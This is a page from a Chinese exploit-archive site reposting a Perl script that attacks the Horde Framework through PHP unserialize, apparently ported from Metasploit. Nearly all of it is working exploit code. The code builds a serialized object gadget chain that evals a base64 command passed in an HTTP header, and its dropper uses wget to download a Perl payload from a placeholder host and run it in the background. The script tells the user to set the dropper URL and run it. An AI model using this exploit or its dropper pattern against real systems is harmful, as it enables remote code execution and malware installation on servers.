首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Horde Framework Unserialize PHP Code Execution
来源:vfocus.net 作者:Macha 发布时间:2014-07-01  
#ported from metasploit by irrlicht
#june 2014
#modify dropper url and run
use strict;
use warnings;
use LWP::UserAgent;
use WWW::Mechanize;
use MIME::Base64;

if (!$ARGV[0]) {
 print "specify full login.php url\n";
 exit;
}
my $dropper = 'system("mkdir /tmp/\\" \\"; cd /tmp/\\" \\"; wget -O deploy.pl http://0.0.0.0/deploy.pl; nohup perl deploy.pl > /dev/null 2>&1 &");';
my $command = encode_base64($dropper . "echo \"999999999\"; echo \"EXPLOITED\"; system(\"ps aux; ls -la /tmp/\\\" \\\"\"); echo \"999999999\";", "");
my $loginpath = $ARGV[0];
my $php_injection = "eval(base64_decode(\
___FCKpd___0
SERVER[HTTP_CMD]));die();"; my $payload_serialized = "_formvars=O:34:\"Horde_Kolab_Server_Decorator_Clean\":2:{s:43:\"\x00Horde_Kolab_Server_Decorator_Clean\x00_server\";"; $payload_serialized .= "O:20:\"Horde_Prefs_Identity\":2:{s:9:\"\x00*\x00_prefs\";O:11:\"Horde_Prefs\":2:{s:8:\"\x00*\x00_opts\";a:1:{s:12:\"sizecallback\";"; $payload_serialized .= "a:2:{i:0;O:12:\"Horde_Config\":1:{s:13:\"\x00*\x00_oldConfig\";s:". length($php_injection) .":\"$php_injection\";}i:1;s:13:\"readXMLConfig\";}}"; $payload_serialized .= "s:10:\"\x00*\x00_scopes\";a:1:{s:5:\"horde\";O:17:\"Horde_Prefs_Scope\":1:{s:9:\"\x00*\x00_prefs\";a:1:{i:0;i:1;}}}}"; $payload_serialized .= "s:13:\"\x00*\x00_prefnames\";a:1:{s:10:\"identities\";i:0;}}s:42:\"\x00Horde_Kolab_Server_Decorator_Clean\x00_added\";a:1:{i:0;i:1;}}"; $|=1; my $ua = new LWP::UserAgent(ssl_opts => { verify_hostname => 0 }); $ua->timeout(3); $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13"); my $request; $request = new HTTP::Request(POST => $loginpath); $request->header('CMD' => $command); $request->header('Content-Type' => "application/x-www-form-urlencoded"); $request->content($payload_serialized); my $mech = WWW::Mechanize->new(timeout => 3, ssl_opts => { verify_hostname => 0 }); my $response = $mech->request($request); my $code = $response->code; my $body = $response->decoded_content; print $response->code."\n"; #print $body."\n"; if ($body =~ /999999999/) { print $body."\n"; }

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Nagios check_dhcp 2.0.2 Race C
·Baidu Spark Browser 26.5.9999.
·Sun/Oracle GlassFish Authentic
·MongoDB NoSQL Collection Enume
·Internet Explorer 8 - Fixed Co
·OpenSSL DTLS Fragment Buffer O
·Wordpress MailPoet (wysija-new
·Supermicro Onboard IPMI Port 4
·Core FTP LE 2.2 - Heap Overflo
·Gitlist <= 0.4.0 - Remote Code
·Gitlist Unauthenticated Remote
·check_dhcp 2.0.2 (Nagios Plugi
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved